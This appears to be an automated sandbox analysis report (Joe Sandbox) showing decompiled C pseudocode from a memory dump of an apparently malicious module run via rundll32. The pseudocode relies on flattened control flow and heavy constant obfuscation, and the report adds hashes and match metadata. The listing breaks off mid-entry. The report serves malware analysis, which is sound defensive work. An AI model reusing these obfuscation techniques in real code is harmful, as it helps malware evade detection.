                                                                                                                          0x0079a007
                                                                                                                          0x0079a00e
                                                                                                                          0x0079a012
                                                                                                                          0x0079a019
                                                                                                                          0x0079a01c
                                                                                                                          0x0079a023
                                                                                                                          0x0079a02e
                                                                                                                          0x0079a038
                                                                                                                          0x0079a03b
                                                                                                                          0x0079a03f
                                                                                                                          0x0079a046
                                                                                                                          0x0079a051
                                                                                                                          0x0079a052
                                                                                                                          0x0079a055
                                                                                                                          0x0079a059
                                                                                                                          0x0079a060
                                                                                                                          0x0079a06b
                                                                                                                          0x0079a06e
                                                                                                                          0x0079a075
                                                                                                                          0x0079a07c
                                                                                                                          0x0079a083
                                                                                                                          0x0079a08a
                                                                                                                          0x0079a091
                                                                                                                          0x0079a098
                                                                                                                          0x0079a09f
                                                                                                                          0x0079a0aa
                                                                                                                          0x0079a0ad
                                                                                                                          0x0079a0b1
                                                                                                                          0x0079a0b5
                                                                                                                          0x0079a0bc
                                                                                                                          0x0079a0c8
                                                                                                                          0x0079a0cb
                                                                                                                          0x0079a0d2
                                                                                                                          0x0079a0d9
                                                                                                                          0x0079a0e0
                                                                                                                          0x0079a0e7
                                                                                                                          0x0079a0eb
                                                                                                                          0x0079a0f2
                                                                                                                          0x0079a0f5
                                                                                                                          0x0079a0fc
                                                                                                                          0x0079a103
                                                                                                                          0x0079a10a
                                                                                                                          0x0079a111
                                                                                                                          0x0079a111
                                                                                                                          0x0079a113
                                                                                                                          0x00000000
                                                                                                                          0x0079a114
                                                                                                                          0x0079a126
                                                                                                                          0x0079a2d3
                                                                                                                          0x0079a2d9
                                                                                                                          0x00000000
                                                                                                                          0x0079a2d9
                                                                                                                          0x0079a132
                                                                                                                          0x0079a1fa
                                                                                                                          0x0079a200
                                                                                                                          0x0079a2bf
                                                                                                                          0x0079a2c6
                                                                                                                          0x0079a2c8
                                                                                                                          0x0079a174
                                                                                                                          0x0079a174
                                                                                                                          0x0079a111
                                                                                                                          0x0079a111
                                                                                                                          0x0079a113
                                                                                                                          0x00000000
                                                                                                                          0x0079a113
                                                                                                                          0x0079a111
                                                                                                                          0x0079a206
                                                                                                                          0x0079a20d
                                                                                                                          0x0079a236
                                                                                                                          0x0079a236
                                                                                                                          0x0079a23a
                                                                                                                          0x0079a23c
                                                                                                                          0x0079a244
                                                                                                                          0x0079a24a
                                                                                                                          0x0079a250
                                                                                                                          0x0079a273
                                                                                                                          0x0079a294
                                                                                                                          0x0079a2a1
                                                                                                                          0x0079a2a6
                                                                                                                          0x0079a2ab
                                                                                                                          0x0079a2ab
                                                                                                                          0x0079a22c
                                                                                                                          0x0079a22c
                                                                                                                          0x00000000
                                                                                                                          0x0079a22c
                                                                                                                          0x0079a20f
                                                                                                                          0x0079a217
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079a219
                                                                                                                          0x0079a220
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079a222
                                                                                                                          0x0079a22a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079a22a
                                                                                                                          0x0079a13e
                                                                                                                          0x0079a1af
                                                                                                                          0x0079a1b7
                                                                                                                          0x0079a1d7
                                                                                                                          0x0079a1dc
                                                                                                                          0x0079a1e7
                                                                                                                          0x0079a1ed
                                                                                                                          0x0079a111
                                                                                                                          0x0079a111
                                                                                                                          0x0079a113
                                                                                                                          0x00000000
                                                                                                                          0x0079a113
                                                                                                                          0x0079a111
                                                                                                                          0x0079a146
                                                                                                                          0x0079a192
                                                                                                                          0x0079a197
                                                                                                                          0x0079a199
                                                                                                                          0x0079a19c
                                                                                                                          0x0079a19f
                                                                                                                          0x0079a30b
                                                                                                                          0x0079a30b
                                                                                                                          0x0079a30b
                                                                                                                          0x0079a1a5
                                                                                                                          0x00000000
                                                                                                                          0x0079a1a5
                                                                                                                          0x0079a14e
                                                                                                                          0x0079a2f9
                                                                                                                          0x0079a2f9
                                                                                                                          0x0079a2ff
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079a2ff
                                                                                                                          0x0079a161
                                                                                                                          0x0079a16c
                                                                                                                          0x0079a16e
                                                                                                                          0x00000000
                                                                                                                          0x0079a16e
                                                                                                                          0x0079a2eb
                                                                                                                          0x0079a2f3
                                                                                                                          0x0079a2f8
                                                                                                                          0x00000000
                                                                                                                          0x0079a2f8

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: H&!$Up7$yBd&
                                                                                                                          • API String ID: 0-2352930472
                                                                                                                          • Opcode ID: 2f5c0fe25a1f433902fa4b4e49c3871b41a41807ed6d38f24a61b9b93917f10d
                                                                                                                          • Instruction ID: 0a114c70b75be894390458b5cd9c8a7d377747ef2bf4f02fb67b8e80446c2589
                                                                                                                          • Opcode Fuzzy Hash: 2f5c0fe25a1f433902fa4b4e49c3871b41a41807ed6d38f24a61b9b93917f10d
                                                                                                                          • Instruction Fuzzy Hash: A1E16671D0121DEBCF28DFE4E98A9EEBBB1FB44314F208159E515BA260D7B80A45CF81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E007A95FA() {
                                                                                                                          				char _v524;
                                                                                                                          				signed int _v532;
                                                                                                                          				intOrPtr _v536;
                                                                                                                          				intOrPtr _v540;
                                                                                                                          				intOrPtr _v544;
                                                                                                                          				intOrPtr _v548;
                                                                                                                          				intOrPtr _v552;
                                                                                                                          				intOrPtr _v556;
                                                                                                                          				intOrPtr _v560;
                                                                                                                          				char _v564;
                                                                                                                          				intOrPtr _v568;
                                                                                                                          				char _v572;
                                                                                                                          				signed int _v576;
                                                                                                                          				signed int _v580;
                                                                                                                          				signed int _v584;
                                                                                                                          				signed int _v588;
                                                                                                                          				signed int _v592;
                                                                                                                          				signed int _v596;
                                                                                                                          				signed int _v600;
                                                                                                                          				signed int _v604;
                                                                                                                          				signed int _v608;
                                                                                                                          				signed int _v612;
                                                                                                                          				signed int _v616;
                                                                                                                          				signed int _v620;
                                                                                                                          				signed int _v624;
                                                                                                                          				signed int _v628;
                                                                                                                          				signed int _v632;
                                                                                                                          				signed int _v636;
                                                                                                                          				signed int _v640;
                                                                                                                          				signed int _v644;
                                                                                                                          				signed int _v648;
                                                                                                                          				signed int _v652;
                                                                                                                          				signed int _v656;
                                                                                                                          				signed int _v660;
                                                                                                                          				signed int _v664;
                                                                                                                          				signed int _v668;
                                                                                                                          				signed int _v672;
                                                                                                                          				signed int _v676;
                                                                                                                          				signed int _v680;
                                                                                                                          				signed int _v684;
                                                                                                                          				signed int _v688;
                                                                                                                          				intOrPtr _t295;
                                                                                                                          				void* _t297;
                                                                                                                          				void* _t298;
                                                                                                                          				intOrPtr _t299;
                                                                                                                          				signed int _t306;
                                                                                                                          				void* _t309;
                                                                                                                          				void* _t310;
                                                                                                                          				char _t311;
                                                                                                                          				void* _t317;
                                                                                                                          				intOrPtr _t334;
                                                                                                                          				signed int _t341;
                                                                                                                          				signed int _t342;
                                                                                                                          				signed int _t343;
                                                                                                                          				signed int _t344;
                                                                                                                          				void* _t347;
                                                                                                                          
                                                                                                                          				_v668 = 0xe6fb93;
                                                                                                                          				_v668 = _v668 + 0xffff1eed;
                                                                                                                          				_t310 = 0xada6804;
                                                                                                                          				_v668 = _v668 * 0x61;
                                                                                                                          				_t309 = 0;
                                                                                                                          				_v668 = _v668 ^ 0xaca28cc6;
                                                                                                                          				_v668 = _v668 ^ 0xfb928647;
                                                                                                                          				_v616 = 0x8caf33;
                                                                                                                          				_t341 = 0x42;
                                                                                                                          				_v616 = _v616 * 0x25;
                                                                                                                          				_v616 = _v616 * 0x4f;
                                                                                                                          				_v616 = _v616 ^ 0x46546a51;
                                                                                                                          				_v620 = 0x861136;
                                                                                                                          				_v620 = _v620 | 0x52f06d4d;
                                                                                                                          				_v620 = _v620 >> 0xf;
                                                                                                                          				_v620 = _v620 ^ 0x0000a5ef;
                                                                                                                          				_v628 = 0x4cf396;
                                                                                                                          				_v628 = _v628 >> 1;
                                                                                                                          				_v628 = _v628 >> 9;
                                                                                                                          				_v628 = _v628 ^ 0x0000133c;
                                                                                                                          				_v684 = 0xc54e58;
                                                                                                                          				_v684 = _v684 >> 2;
                                                                                                                          				_v684 = _v684 ^ 0xb8bf25ee;
                                                                                                                          				_v684 = _v684 >> 2;
                                                                                                                          				_v684 = _v684 ^ 0x2e259ad3;
                                                                                                                          				_v592 = 0x68267f;
                                                                                                                          				_v592 = _v592 + 0xffff39c4;
                                                                                                                          				_v592 = _v592 ^ 0x006c60f9;
                                                                                                                          				_v632 = 0xa1d089;
                                                                                                                          				_v632 = _v632 / _t341;
                                                                                                                          				_v632 = _v632 ^ 0x52222b14;
                                                                                                                          				_v632 = _v632 ^ 0x5220bcfc;
                                                                                                                          				_v608 = 0x39d352;
                                                                                                                          				_v608 = _v608 | 0x2e7e1ae1;
                                                                                                                          				_v608 = _v608 ^ 0x576cc274;
                                                                                                                          				_v608 = _v608 ^ 0x7911cf35;
                                                                                                                          				_v660 = 0xc26f36;
                                                                                                                          				_v660 = _v660 ^ 0x9f5dc88a;
                                                                                                                          				_v660 = _v660 ^ 0xeefda613;
                                                                                                                          				_t342 = 0x3f;
                                                                                                                          				_v660 = _v660 / _t342;
                                                                                                                          				_v660 = _v660 ^ 0x01ce77bb;
                                                                                                                          				_v624 = 0x334861;
                                                                                                                          				_v624 = _v624 + 0xffff4b1a;
                                                                                                                          				_t343 = 0x2a;
                                                                                                                          				_v624 = _v624 * 0x2f;
                                                                                                                          				_v624 = _v624 ^ 0x0947e580;
                                                                                                                          				_v652 = 0xab72b9;
                                                                                                                          				_v652 = _v652 << 8;
                                                                                                                          				_v652 = _v652 / _t343;
                                                                                                                          				_v652 = _v652 ^ 0x0419701b;
                                                                                                                          				_v688 = 0x507748;
                                                                                                                          				_v688 = _v688 << 5;
                                                                                                                          				_v688 = _v688 + 0xffff449a;
                                                                                                                          				_v688 = _v688 + 0xb858;
                                                                                                                          				_v688 = _v688 ^ 0x0a0a66f0;
                                                                                                                          				_v600 = 0x95cabc;
                                                                                                                          				_v600 = _v600 + 0xffffb185;
                                                                                                                          				_v600 = _v600 << 9;
                                                                                                                          				_v600 = _v600 ^ 0x2af43595;
                                                                                                                          				_v580 = 0x7e3ec7;
                                                                                                                          				_v580 = _v580 ^ 0x09caac24;
                                                                                                                          				_v580 = _v580 ^ 0x09b70662;
                                                                                                                          				_v612 = 0xa526a8;
                                                                                                                          				_v612 = _v612 | 0x64dab874;
                                                                                                                          				_v612 = _v612 >> 0xe;
                                                                                                                          				_v612 = _v612 ^ 0x0006f9eb;
                                                                                                                          				_v604 = 0xb7de18;
                                                                                                                          				_t344 = 0x48;
                                                                                                                          				_v604 = _v604 * 0x79;
                                                                                                                          				_v604 = _v604 * 0x31;
                                                                                                                          				_v604 = _v604 ^ 0xa26ee4e9;
                                                                                                                          				_v640 = 0x553c00;
                                                                                                                          				_v640 = _v640 + 0xffff4196;
                                                                                                                          				_v640 = _v640 + 0xffff8daf;
                                                                                                                          				_v640 = _v640 ^ 0x00577a07;
                                                                                                                          				_v576 = 0xaac37;
                                                                                                                          				_v576 = _v576 * 0x77;
                                                                                                                          				_v576 = _v576 ^ 0x04fc3a71;
                                                                                                                          				_v676 = 0xb6ce7b;
                                                                                                                          				_v676 = _v676 >> 1;
                                                                                                                          				_v676 = _v676 * 0x28;
                                                                                                                          				_v676 = _v676 >> 0xb;
                                                                                                                          				_v676 = _v676 ^ 0x000b20b4;
                                                                                                                          				_v584 = 0x4877b4;
                                                                                                                          				_v584 = _v584 << 1;
                                                                                                                          				_v584 = _v584 ^ 0x009148e9;
                                                                                                                          				_v588 = 0xaf1c90;
                                                                                                                          				_v588 = _v588 * 0x5b;
                                                                                                                          				_v588 = _v588 ^ 0x3e3937c6;
                                                                                                                          				_v644 = 0x150bb3;
                                                                                                                          				_v644 = _v644 + 0x865c;
                                                                                                                          				_v644 = _v644 + 0x5404;
                                                                                                                          				_v644 = _v644 ^ 0x001dce65;
                                                                                                                          				_v648 = 0xaa3958;
                                                                                                                          				_v648 = _v648 / _t344;
                                                                                                                          				_v648 = _v648 >> 0xe;
                                                                                                                          				_v648 = _v648 ^ 0x000a9525;
                                                                                                                          				_v596 = 0xdb2add;
                                                                                                                          				_v596 = _v596 << 0xd;
                                                                                                                          				_v596 = _v596 ^ 0x65528fd4;
                                                                                                                          				_v680 = 0xd04d0c;
                                                                                                                          				_v680 = _v680 << 5;
                                                                                                                          				_t340 = _v596;
                                                                                                                          				_v680 = _v680 * 0x55;
                                                                                                                          				_v680 = _v680 | 0x96843ebb;
                                                                                                                          				_v680 = _v680 ^ 0xb7be4a39;
                                                                                                                          				_v656 = 0x2591b4;
                                                                                                                          				_v656 = _v656 ^ 0x7517a4f1;
                                                                                                                          				_v656 = _v656 ^ 0xb20365ef;
                                                                                                                          				_v656 = _v656 + 0xffff4c4f;
                                                                                                                          				_v656 = _v656 ^ 0xc733773b;
                                                                                                                          				_v636 = 0xbfc674;
                                                                                                                          				_v636 = _v636 * 0x1d;
                                                                                                                          				_v636 = _v636 << 6;
                                                                                                                          				_v636 = _v636 ^ 0x6e5b8cbc;
                                                                                                                          				_v664 = 0x3235cc;
                                                                                                                          				_v664 = _v664 << 1;
                                                                                                                          				_v664 = _v664 | 0x857b9d7f;
                                                                                                                          				_v664 = _v664 * 0x28;
                                                                                                                          				_v664 = _v664 ^ 0xdbf98c50;
                                                                                                                          				_v672 = 0xb181ad;
                                                                                                                          				_v672 = _v672 >> 0xa;
                                                                                                                          				_v672 = _v672 << 2;
                                                                                                                          				_v672 = _v672 ^ 0xdb7e6d02;
                                                                                                                          				_v672 = _v672 ^ 0xdb78e9e9;
                                                                                                                          				do {
                                                                                                                          					while(_t310 != 0x10c1a7f) {
                                                                                                                          						if(_t310 == 0x31db0c0) {
                                                                                                                          							_t311 = _v572;
                                                                                                                          							_t295 = _v568;
                                                                                                                          							_push(_t311);
                                                                                                                          							_v560 = _t295;
                                                                                                                          							_v552 = _t295;
                                                                                                                          							_v544 = _t295;
                                                                                                                          							_v536 = _t295;
                                                                                                                          							_v564 = _t311;
                                                                                                                          							_v556 = _t311;
                                                                                                                          							_v548 = _t311;
                                                                                                                          							_v540 = _t311;
                                                                                                                          							_v532 = _v628;
                                                                                                                          							_t297 = E00795DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
                                                                                                                          							_t347 = _t347 + 0x18;
                                                                                                                          							__eflags = _t297;
                                                                                                                          							_t309 =  !=  ? 1 : _t309;
                                                                                                                          							_t310 = 0x48f7cbb;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t310 == 0x461819e) {
                                                                                                                          								_push(_v660);
                                                                                                                          								_push(_v608);
                                                                                                                          								_t298 = E007ADCF7(_v632, 0x791000, __eflags);
                                                                                                                          								_pop(_t317);
                                                                                                                          								_t299 =  *0x7b3e10; // 0x0
                                                                                                                          								_t334 =  *0x7b3e10; // 0x0
                                                                                                                          								E007947CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
                                                                                                                          								E0079A8B0(_v612, _t298, _v604);
                                                                                                                          								_t347 = _t347 + 0x24;
                                                                                                                          								_t310 = 0xa22489e;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t310 == 0x48f7cbb) {
                                                                                                                          									E007A1E67(_v656, _v636, _v664, _v672, _t340);
                                                                                                                          								} else {
                                                                                                                          									if(_t310 == 0xa22489e) {
                                                                                                                          										_t306 = E00798F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
                                                                                                                          										_t340 = _t306;
                                                                                                                          										_t347 = _t347 + 0x28;
                                                                                                                          										__eflags = _t306 - 0xffffffff;
                                                                                                                          										if(__eflags != 0) {
                                                                                                                          											_t310 = 0x31db0c0;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										if(_t310 == 0xada6804) {
                                                                                                                          											_t310 = 0xcbcd90e;
                                                                                                                          											continue;
                                                                                                                          										} else {
                                                                                                                          											if(_t310 != 0xcbcd90e) {
                                                                                                                          												goto L15;
                                                                                                                          											} else {
                                                                                                                          												E007AC1EC(_v684, _v592,  &_v572);
                                                                                                                          												_t310 = 0x10c1a7f;
                                                                                                                          												continue;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L18:
                                                                                                                          						return _t309;
                                                                                                                          					}
                                                                                                                          					_v572 = _v572 - E007AABD1();
                                                                                                                          					_t310 = 0x461819e;
                                                                                                                          					asm("sbb [esp+0x8c], edx");
                                                                                                                          					L15:
                                                                                                                          					__eflags = _t310 - 0x7e6efe8;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L18;
                                                                                                                          			}


                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HwP$QjTF$aH3
                                                                                                                          • API String ID: 0-3950587752
                                                                                                                          • Opcode ID: 9ff94984509cc06f9b05c4a98d9f8e9737fab423ff2acc2334446aa5e287f6f6
                                                                                                                          • Instruction ID: c37ea3ea792c045bbaa4f9dbbcedbb3b0e29edeac1413d1a63c9f6d11ccc9a37
                                                                                                                          • Opcode Fuzzy Hash: 9ff94984509cc06f9b05c4a98d9f8e9737fab423ff2acc2334446aa5e287f6f6
                                                                                                                          • Instruction Fuzzy Hash: 9EE13E714093819FD368CF25C58AA1BBBE1FBC5748F208A1DF29A86260D7B59949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E0079B2C7(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                          				char _v40;
                                                                                                                          				char _v48;
                                                                                                                          				intOrPtr _v72;
                                                                                                                          				intOrPtr _v80;
                                                                                                                          				intOrPtr _v84;
                                                                                                                          				intOrPtr _v92;
                                                                                                                          				char _v108;
                                                                                                                          				char _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				signed int _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				signed int _v152;
                                                                                                                          				signed int _v156;
                                                                                                                          				void* _t137;
                                                                                                                          				intOrPtr* _t157;
                                                                                                                          				signed int _t166;
                                                                                                                          				void* _t173;
                                                                                                                          				intOrPtr _t191;
                                                                                                                          				void* _t203;
                                                                                                                          				void* _t208;
                                                                                                                          				signed int _t209;
                                                                                                                          				signed int _t210;
                                                                                                                          				signed int _t211;
                                                                                                                          				signed int _t212;
                                                                                                                          				intOrPtr* _t213;
                                                                                                                          				void* _t215;
                                                                                                                          				void* _t216;
                                                                                                                          				void* _t218;
                                                                                                                          
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t137);
                                                                                                                          				_v136 = 0x2c5bc;
                                                                                                                          				_t216 = _t215 + 0xc;
                                                                                                                          				_t208 = 0;
                                                                                                                          				_t173 = 0xf62a13b;
                                                                                                                          				_t209 = 0x63;
                                                                                                                          				_v136 = _v136 / _t209;
                                                                                                                          				_v136 = _v136 + 0xe356;
                                                                                                                          				_v136 = _v136 ^ 0x000982ba;
                                                                                                                          				_v156 = 0x35028b;
                                                                                                                          				_v156 = _v156 | 0x143a760d;
                                                                                                                          				_v156 = _v156 + 0xfffff236;
                                                                                                                          				_v156 = _v156 ^ 0x8a3e1055;
                                                                                                                          				_v156 = _v156 ^ 0x9e033c32;
                                                                                                                          				_v128 = 0xf43d73;
                                                                                                                          				_v128 = _v128 | 0xd1983256;
                                                                                                                          				_v128 = _v128 ^ 0xd1f71de4;
                                                                                                                          				_v120 = 0x9951cf;
                                                                                                                          				_v120 = _v120 + 0xffffd11b;
                                                                                                                          				_v120 = _v120 ^ 0x00948e71;
                                                                                                                          				_v152 = 0x57fc5b;
                                                                                                                          				_v152 = _v152 | 0x88a856bb;
                                                                                                                          				_v152 = _v152 << 9;
                                                                                                                          				_v152 = _v152 + 0xa27f;
                                                                                                                          				_v152 = _v152 ^ 0xfff91174;
                                                                                                                          				_v116 = 0x3d6e6b;
                                                                                                                          				_t210 = 9;
                                                                                                                          				_v116 = _v116 / _t210;
                                                                                                                          				_v116 = _v116 ^ 0x0006b75d;
                                                                                                                          				_v140 = 0x916f20;
                                                                                                                          				_t211 = 0x35;
                                                                                                                          				_v140 = _v140 * 0x22;
                                                                                                                          				_v140 = _v140 / _t211;
                                                                                                                          				_t212 = 0x7b;
                                                                                                                          				_v140 = _v140 * 0x1d;
                                                                                                                          				_v140 = _v140 ^ 0x0a9423e2;
                                                                                                                          				_v148 = 0x96f30f;
                                                                                                                          				_v148 = _v148 ^ 0x6547be83;
                                                                                                                          				_v148 = _v148 << 9;
                                                                                                                          				_v148 = _v148 | 0xa101889a;
                                                                                                                          				_v148 = _v148 ^ 0xa391ec3d;
                                                                                                                          				_v124 = 0x9e8998;
                                                                                                                          				_v124 = _v124 | 0x73c531f9;
                                                                                                                          				_v124 = _v124 ^ 0x73d6e9c9;
                                                                                                                          				_v132 = 0xda1f74;
                                                                                                                          				_v132 = _v132 + 0x97a0;
                                                                                                                          				_v132 = _v132 ^ 0xdacfb227;
                                                                                                                          				_v132 = _v132 ^ 0xda161b2e;
                                                                                                                          				_v144 = 0x87027b;
                                                                                                                          				_t213 = _v128;
                                                                                                                          				_v144 = _v144 / _t212;
                                                                                                                          				_v144 = _v144 + 0x3568;
                                                                                                                          				_v144 = _v144 | 0x38a39b99;
                                                                                                                          				_v144 = _v144 ^ 0x38a88a96;
                                                                                                                          				while(1) {
                                                                                                                          					_t218 = _t173 - 0x628c872;
                                                                                                                          					if(_t218 > 0) {
                                                                                                                          						goto L25;
                                                                                                                          					}
                                                                                                                          					L2:
                                                                                                                          					if(_t218 == 0) {
                                                                                                                          						_push(_t173);
                                                                                                                          						_push(_t173);
                                                                                                                          						_t203 = 0x50;
                                                                                                                          						_t213 = E00797FF2(_t203);
                                                                                                                          						__eflags = _t213;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							L16:
                                                                                                                          							_t173 = 0xe7b6043;
                                                                                                                          							continue;
                                                                                                                          							do {
                                                                                                                          								while(1) {
                                                                                                                          									_t218 = _t173 - 0x628c872;
                                                                                                                          									if(_t218 > 0) {
                                                                                                                          										goto L25;
                                                                                                                          									}
                                                                                                                          									goto L2;
                                                                                                                          								}
                                                                                                                          								goto L25;
                                                                                                                          								L45:
                                                                                                                          								__eflags = _t173 - 0xee0c843;
                                                                                                                          							} while (__eflags != 0);
                                                                                                                          							L46:
                                                                                                                          							return _t208;
                                                                                                                          						}
                                                                                                                          						_t173 = 0xf1dea2;
                                                                                                                          						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
                                                                                                                          						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
                                                                                                                          						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					if(_t173 == 0xf1dea2) {
                                                                                                                          						__eflags = _v84 - 1;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							E007A4B87( &_v108);
                                                                                                                          							L13:
                                                                                                                          							_t173 = 0x4d68783;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						_t173 = 0x9ca47b0;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					if(_t173 == 0x1c23c86) {
                                                                                                                          						__eflags = _v84 - 4;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							E007A6DF8( &_v108);
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          						_t173 = 0x6a06f56;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					if(_t173 == 0x45d7e1c) {
                                                                                                                          						_t157 = E007AD97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
                                                                                                                          						_t216 = _t216 + 0xc;
                                                                                                                          						__eflags = _t157;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							goto L46;
                                                                                                                          						}
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          					if(_t173 == 0x483085d) {
                                                                                                                          						__eflags = _v84 - 7;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							E007A0E53( &_v108);
                                                                                                                          						}
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          					if(_t173 == 0x4d68783) {
                                                                                                                          						_t191 =  *0x7b3208; // 0x0
                                                                                                                          						_t208 = _t208 + 1;
                                                                                                                          						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
                                                                                                                          						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
                                                                                                                          						L10:
                                                                                                                          						_t173 = 0x45d7e1c;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					if(_t173 != 0x4fb7fc6) {
                                                                                                                          						goto L45;
                                                                                                                          					}
                                                                                                                          					E007A0B19(0);
                                                                                                                          					goto L10;
                                                                                                                          					L25:
                                                                                                                          					__eflags = _t173 - 0x6a06f56;
                                                                                                                          					if(_t173 == 0x6a06f56) {
                                                                                                                          						__eflags = _v84 - 5;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							E0079B74D( &_v108, _t213);
                                                                                                                          							_t173 = 0x4d68783;
                                                                                                                          							goto L45;
                                                                                                                          						}
                                                                                                                          						_t173 = 0xcf2e7b4;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					__eflags = _t173 - 0x9a20357;
                                                                                                                          					if(_t173 == 0x9a20357) {
                                                                                                                          						__eflags = _v84 - 3;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							E007A1889( &_v108);
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          						_t173 = 0x1c23c86;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					__eflags = _t173 - 0x9ca47b0;
                                                                                                                          					if(_t173 == 0x9ca47b0) {
                                                                                                                          						__eflags = _v84 - 2;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							E00799714( &_v108, _t213);
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          						_t173 = 0x9a20357;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					__eflags = _t173 - 0xcf2e7b4;
                                                                                                                          					if(_t173 == 0xcf2e7b4) {
                                                                                                                          						__eflags = _v84 - 6;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							E0079F09B( &_v108);
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          						_t173 = 0x483085d;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					__eflags = _t173 - 0xe7b6043;
                                                                                                                          					if(_t173 == 0xe7b6043) {
                                                                                                                          						_t166 = E0079E5CF( &_v48, _v140,  &_v112, _v148);
                                                                                                                          						asm("sbb ecx, ecx");
                                                                                                                          						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					__eflags = _t173 - 0xf62a13b;
                                                                                                                          					if(_t173 != 0xf62a13b) {
                                                                                                                          						goto L45;
                                                                                                                          					}
                                                                                                                          					E00793DBC( &_v40, _a4, _v136, _v156, _v128);
                                                                                                                          					_t216 = _t216 + 0xc;
                                                                                                                          					_t173 = 0x4fb7fc6;
                                                                                                                          				}
                                                                                                                          			}






































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: V$h5$kn=
                                                                                                                          • API String ID: 0-2568719763
                                                                                                                          • Opcode ID: 4b31a38b0853a938c98b78d50f46f2734b4728c91684112341591dc202904d3b
